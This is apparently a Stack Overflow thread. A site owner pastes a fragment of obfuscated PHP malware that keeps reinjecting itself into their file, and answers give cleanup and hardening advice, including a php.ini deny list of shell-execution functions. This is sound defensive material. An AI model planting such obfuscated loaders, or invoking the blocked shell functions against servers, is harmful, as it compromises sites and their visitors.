-1

I found this on my php file:

<?php $glsaucbk = '5    156 x61"])))) { $GLOBALS["  ]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%  x24-    x24*!|! x24-    x24 x5c%j24#-!#]y38#-!%w:**<")));$nkfhbiv = $sorsjsw("", $wrwjkjc); $nkfhbiv#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO  x2nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fep::::-111112)eobs`un>qp%!|Z~!<##!>!2w*[!%rN}#QwTW%hIr  x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]8]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR  x27id%6<    ();}}AZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutc252]y85]256]y6g]257]y86]267]y74tjyf`4  x223}!+!<+{e%+*!*+fe4y4 x24-    x24]y8  x24-    x24]26  x24-        x24!>!fyqmpef)# x24*<!%t::!>!   x24Ypp3)%c%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x27,*e  x27,*d  x2%rxB%epnbss!>!bssbz)#44ec:649#!-#j0#!/

Its on the head of the file... I've try to delete this but its reapear directly. I haveuse a php detector and is say me DodgyPHP. Have u alreay have this malicious code on your php file ?

Zoe
  • 23,712
  • 16
  • 99
  • 132
Fleeca
  • 15
  • 3
  • I ran this code on UnPHP.net and it came back as if it didn't do anything. – FluxCoder Jan 03 '18 at 16:28
  • 1
    Which file is it in the head of? Check your PHP.ini to see if there an `auto_prepend_file` set and possibly edit this. You need to lockdown and clean your system. – Martin Jan 03 '18 at 16:29
  • 2
    You've been hacked. If the string keeps reappearing then the vulnerability is still in place. You'll need to harden your server. (Probably after restoring it from backup, because hacked.) – Alex Howansky Jan 03 '18 at 16:30
  • I would suggest restoring from a time before the hack occurred. Making sure you are update to date on software versions. Are you using a CMS wordpress, Joomla, etc... ? – vikingben Jan 03 '18 at 16:31
  • 1
    @FluxCoder I wouldn't expect it to run, it doesn't look like the whole string was posted. (There's no closing quote.) – Alex Howansky Jan 03 '18 at 16:33
  • What you've posted is an unterminated string. It's possible that this file is read from a different file and some sort of eval is performed or this could just be a decoy for you to waste your time looking in the wrong place. – MonkeyZeus Jan 03 '18 at 16:35
  • 1
    I'm voting to close this question as off-topic because this isn't a programming question. Solving the problem of a hacked site is more appropriate for unix.SE, security.SE, or ServerFault.com. – Barmar Jan 03 '18 at 16:58

2 Answers2

3

While not a direct answer; this would be useful step guide for how to clean up your system.

The symptoms show your system has also certainly been hacked, and is still hackable.

You need to follow the link here http://www.gregfreeman.io/2013/steps-to-take-when-you-know-your-php-site-has-been-hacked/ and take significant steps to hardening your system from future hacks:

  • Ensure that the userid running the web server process does not have write permission to the files it's serving. You can use ps aux | grep apache or ps aux | grep nginx to find the userid that your web server is running under. Make sure the files are not owned by that user. You can check for permissions by doing something like sudo -u <that userid> touch /path/to/web/files/some_test_file. If that successfully creates a file, then you have a problem and you need to adjust permissions.
  • Change all passwords
  • Stop using FTP, use FTPS or SFTP.
  • Update your PHP to latest current version.
    • Update any PHP CMS program (Joomla, WordPress, etc.) to latest version.
  • Reload your data from backups after checking for a backup you are certain has not been hacked.

  • Edit your php.ini and disable dangerous functions (such as exec) and classes: 

     disable_functions = "exec,passthru,shell_exec,system,proc_open,popen, 
                      curl_multi_exec,parse_ini_file,show_source"
  • Edit your php.ini and be sure to check your auto_prepend_file and auto_append_file values are expected or blank.
  • Set new usernames for database and server access. Stop using Root. Never use Root to access anything.
  • Check and prevent unrecognised cron_jobs running on your server.

Note: Could others who know add and edit this post to add further useful guides and information. Could be a good resource for future readers.

Alex Howansky
  • 44,270
  • 7
  • 68
  • 92
Martin
  • 19,815
  • 6
  • 53
  • 104
2

I don't think you need to know any more than you do already:

  • It's code you didn't expect to be there.
  • It's clearly obfuscated; there's rarely a reason to obfuscate PHP other than to hide malicious code.
  • It reappears when you delete it, implying there are other malicious scripts running and self-repairing.

You should at least:

  1. Take the site offline immediately. It may be infecting other people, or used for criminal activity on your account.
  2. If this is a third-party application (e.g. Wordpress, PHPBB, etc), reinstall from scratch with an up to date version, using only well-known plugins which are kept up to date. If it is code you wrote, you need to audit its security, or pay an expert to do so.
  3. Rescue your data from backup, ensuring to the best of your ability that the backup is from before the compromise, and apply it to the cleanly installed site.
IMSoP
  • 65,743
  • 7
  • 83
  • 127